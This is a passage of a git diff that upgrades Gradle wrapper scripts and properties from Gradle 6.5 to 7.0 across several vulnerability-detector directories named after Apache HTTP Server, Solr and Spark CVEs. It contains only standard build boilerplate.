or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_http_server_cve_2021_41773/gradlew.bat b/community/detectors/apache_http_server_cve_2021_41773/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/apache_http_server_cve_2021_41773/gradlew.bat +++ b/community/detectors/apache_http_server_cve_2021_41773/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_solr_arbitrary_file_reading/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/apache_solr_arbitrary_file_reading/gradlew b/community/detectors/apache_solr_arbitrary_file_reading/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/apache_solr_arbitrary_file_reading/gradlew +++ b/community/detectors/apache_solr_arbitrary_file_reading/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_solr_arbitrary_file_reading/gradlew.bat b/community/detectors/apache_solr_arbitrary_file_reading/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/apache_solr_arbitrary_file_reading/gradlew.bat +++ b/community/detectors/apache_solr_arbitrary_file_reading/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/apache_spark_cve_2022_33891/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/apache_spark_cve_2022_33891/gradlew b/community/detectors/apache_spark_cve_2022_33891/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/apache_spark_cve_2022_33891/gradlew +++ b/community/detectors/apache_spark_cve_2022_33891/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
